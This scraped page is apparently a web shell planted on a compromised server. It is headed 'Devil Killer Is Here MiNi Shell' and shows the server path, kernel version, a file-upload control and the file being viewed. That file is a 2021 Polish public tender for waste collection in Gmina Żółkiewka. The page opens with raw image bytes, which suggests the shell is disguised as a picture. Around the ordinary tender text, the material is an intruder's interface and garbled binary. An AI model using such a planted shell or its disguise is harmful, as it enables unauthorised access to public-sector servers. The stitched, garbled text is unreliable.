JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031168801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie odpadów komunalnych z nieruchomości na terenie Gminy Żółkiewka. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŻÓŁKIEWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950371726</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Hetmana Żółkiewskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żółkiewka-Osada</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846831676</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846831677</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zolkiewka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zolkiewka.pl/; https://ugzolkiewka.bip.e-zeto.eu/; https://zamowienia.zolkiewka.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie odpadów komunalnych z nieruchomości na terenie Gminy Żółkiewka. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ad18b4f2-59b6-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00311688</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.zolkiewka.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>https://zamowienia.zolkiewka.pl lub poczty elektronicznej: sekretariat@zolkiewka.pl Korzystanie z<br/>platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oświadczenia, wnioski, zawiadomienia oraz informacje Wykonawcy przekazują drogą elektroniczną<br/>przy użyciu Platformy lub poczty elektronicznej. Za datę wpływu oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę:<br/>1.1. w przypadku korzystania z Platformy – datę ich rejestracji na Platformie;<br/>1.2. w przypadku korzystania z poczty elektronicznej – datę zapisu na serwerze odbiorczym<br/>(Zamawiającego).<br/>2. Ogólne zasady korzystania z Platformy:<br/>2.1. Korzystanie z platformy jest bezpłatne.<br/>2.2. Instrukcja Użytkownika - korzystania z Platformy Zamówień Publicznych ZETOPZP znajduje się na<br/>Portalu, w zakładce „Pomoc”.<br/>2.3. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień Publicznych<br/>ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na<br/>stronie internetowej https://zamowienia.zolkiewka.pl w zakładce pomoc oraz uznaje go za wiążący. <br/>2.4. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>https://zamowienia.zolkiewka.pl/#/authentication/login<br/>2.5. Wykonawca aby przystąpić do postępowania musi założyć konto na<br/>Platformie https://zamowienia.zolkiewka.pl/#/authentication/register gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny a następnie ustanawia<br/>hasło.<br/>2.6. Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać dane<br/>firmy, którą osoba zakładająca konto reprezentuje.<br/>2.7. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy i powiadomień mailowych.<br/>3. Zgodnie z art. 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem<br/>z Platformy:<br/>3.1. stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512<br/>kb/s.<br/>3.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje.<br/>3.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/>obsługująca TLS 1.2 z wyjątkiem Internet Explorer.<br/>3.4. Włączona obsługa JavaScript.<br/>3.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez Wykonawcę.<br/>3.7. Zamawiający, zgodnie z § 3 ust. 3 powołanego powyżej Rozporządzenia określa:<br/>3.7.1. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 100 MB.<br/>3.7.2. Informacje na temat kodowania i odbioru danych:<br/>3.7.2.1. Plik załączony przez Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany,<br/>widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>3.7.2.2. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest synchronizowany ze<br/>znacznikiem czasu UTC.<br/>3.8. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami<br/>korzystania z platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania<br/>teleinformatycznego Platforma Zamówień Publicznych, tel. +48 817184227, e-mail:<br/>pomoc@zeto.lublin.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. W sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.1. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Żółkiewka.<br/>1.2. Kontakt z Inspektorem Ochrony Danych – inspektor@cbi24.pl<br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>1.5. Pani/Pana dane osobowe będą przechowywane na czas przewidziany przepisami prawa.<br/>1.6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>2 . W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>3. Posiada Pani/Pan:<br/>3.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>3.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;3.3 na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>3.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>4. Nie przysługuje Pani/Panu:<br/>4.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>4.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>4.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKR.271.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.2 Zakres przedmiotu zamówienia obejmuje:<br/>4.2.1 odbieranie, transport i zagospodarowanie odpadów komunalnych od wszystkich <br/>właścicieli nieruchomości zamieszkałych i niezamieszkałych;<br/>4.2.2 odbieranie, transport i zagospodarowanie odpadów komunalnych z Punktu <br/>Selektywnej Zbiórki Odpadów Komunalnych;<br/>4.2.3 Szczegółowy opis i zakres wykonania przedmiotu zamówienia określa zał. nr 1 do <br/>SWZ oraz wzór umowy (zał. Nr 5 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90511200-4 - Usługi gromadzenia odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90514000-3 - Usługi recyklingu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może<br/>otrzymać max 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności (Tp)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostarczanie worków mieszkańcom (Dwm)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki <br/>dotyczące:<br/>7.2.1 zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa <br/>warunku w powyższym zakresie. <br/>7.2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o <br/>ile wynika to z odrębnych przepisów. W celu potwierdzenia spełniania przez <br/>Wykonawcę warunku udziału w postępowaniu Zamawiający wymaga:<br/>7.2.2.1 posiadania wpisu do Rejestru Działalności Regulowanej prowadzonego przez <br/>Wójta Gminy Żółkiewka w zakresie odbierania odpadów komunalnych od <br/>właścicieli nieruchomości, o którym mowa w art. 9B ustawy z dnia 13 <br/>września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z <br/>2021 r. poz. 888);<br/>7.2.2.2 posiadania wpisu do rejestru podmiotów wprowadzających produkty, produkty <br/>w opakowaniach i gospodarujących odpadami (rejestr BDO) zgodnie z <br/>wymogami art. 49 ust. z dnia 14 grudnia 2021 r o odpadach (t.j. Dz.U. z 2021 <br/>r. poz. 779).<br/>7.2.3 sytuacji ekonomicznej lub finansowej - W celu potwierdzenia spełniania przez <br/>Wykonawcę warunku udziału w postępowaniu Zamawiający wymaga:<br/>7.2.3.1 posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej w <br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze <br/>wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>7.2.4 zdolności technicznej lub zawodowej – W celu potwierdzenia spełniania przez <br/>Wykonawcę warunku udziału w postępowaniu Zamawiający wymaga:<br/>7.2.4.1 Dysponowania narzędziami, wyposażeniem zakładu lub urządzeniami <br/>technicznymi dostępnymi Wykonawcy w celu wykonania zamówienia <br/>publicznego tj.:<br/>7.2.4.1.1 bazą transportową w odległości nie większej niż 60 km od granicy <br/>Gminy Żółkiewka z zapleczem techniczno-biurowym, spełniającą <br/>wymagania przepisów budowlanych, sanitarnych i ochrony środowiska. <br/>Baza transportowa ma zapewniać możliwość garażowania taboru <br/>samochodowego na jej terenie, a zaplecze techniczno-biurowe ma <br/>umożliwiać kontakt Wykonawcy z przedstawicielem Zamawiającego.<br/>7.2.4.1.2 co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych <br/>odpadów komunalnych,<br/>7.2.4.1.3 co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie <br/>zbieranych odpadów komunalnych, <br/>7.2.4.1.4 instalacją komunalną do przetwarzania odpadów komunalnych: <br/>niesegregowanych (zmieszanych) odpadów komunalnych oraz <br/>pozostałości z przetwarzania odpadów komunalnych. Wykonawca <br/>przez cały okres trwania umowy powinien dysponować instalacją <br/>komunalną w rozumieniu art. 35 ust. 6 ustawy z dnia 14 grudnia 2012 r. <br/>(t.j. Dz.U. z 2021 r. poz. 779). Przez pojęcie dysponowanie należy <br/>rozmieć posiadanie własnej instalacji lub posiadanie zapewnionej <br/>możliwości korzystania z instalacji komunalnej na czas realizacji <br/>umowy np. w drodze zawartej umowy lub porozumienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. posiadania wpisu do Rejestru Działalności Regulowanej prowadzonego przez <br/>Wójta Gminy Żółkiewka w zakresie odbierania odpadów komunalnych od <br/>właścicieli nieruchomości, o którym mowa w art. 9B ustawy z dnia 13 <br/>września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z <br/>2021 r. poz. 888);<br/>2. posiadania wpisu do rejestru podmiotów wprowadzających produkty, produkty <br/>w opakowaniach i gospodarujących odpadami (rejestr BDO) zgodnie z <br/>wymogami art. 49 ust. z dnia 14 grudnia 2021 r o odpadach (t.j. Dz.U. z 2021 <br/>r. poz. 779).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 Pzp, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/>lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który <br/>złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy <br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie <br/>oferty, niezależnie od innego wykonawcy należącego do tej samej grupy <br/>kapitałowej (zgodnie z zał. Nr 6 do SWZ).<br/>2. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych <br/>wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o <br/>podstawie do dysponowania tymi zasobami (zgodnie z załącznikiem nr 4 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>Zamawiający uzna warunki udziału za spełnione jeżeli:<br/>7.3.1 warunek dotyczący uprawnień do prowadzenia określonej działalności <br/>gospodarczej lub zawodowej, o którym mowa w pkt 7.2.2 SWZ jest spełniony, jeżeli <br/>co najmniej jeden z wykonawców wspólnie obiegających się o udzielenie <br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności <br/>gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia <br/>są wymagane.<br/>7.3.2 Warunki udziału w postępowaniu muszą zostać spełnione przez wykonawców <br/>łącznie.<br/>7.4 Zamawiający odrzuci ofertę, jeżeli zostanie złożona przez wykonawcę niespełniającego <br/>warunków udziału w postępowaniu.<br/>7.5 Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu <br/>o przedłożone przez wykonawców dokumenty i oświadczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności. 